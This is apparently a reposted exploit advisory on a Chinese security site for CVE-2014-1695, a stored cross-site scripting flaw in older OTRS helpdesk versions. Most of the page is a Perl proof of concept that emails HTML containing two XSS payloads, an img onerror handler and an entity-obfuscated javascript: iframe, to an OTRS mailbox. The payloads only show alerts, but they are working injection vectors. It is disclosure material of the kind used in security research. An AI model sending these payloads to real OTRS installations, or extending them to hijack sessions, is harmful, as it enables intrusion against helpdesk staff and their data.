OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerabili

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerabili

来源：http://adamziaja.com 作者：AdamZiaja 发布时间：2015-04-28

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS

# Date: 28.01.2014

# Exploit Author: Adam Ziaja http://adamziaja.com

# Vendor Homepage: https://www.otrs.com

# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5

# CVE : CVE-2014-1695

#!/usr/bin/perl -w

use strict;

use MIME::Lite;

my $msg = MIME::Lite->new(

Subject => 'OTRS XSS PoC',

From => 'attacker@example.com',

To => 'otrs@example.com',

Type => 'text/html',

Data =>

'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe

src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'

);

$msg->send();

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告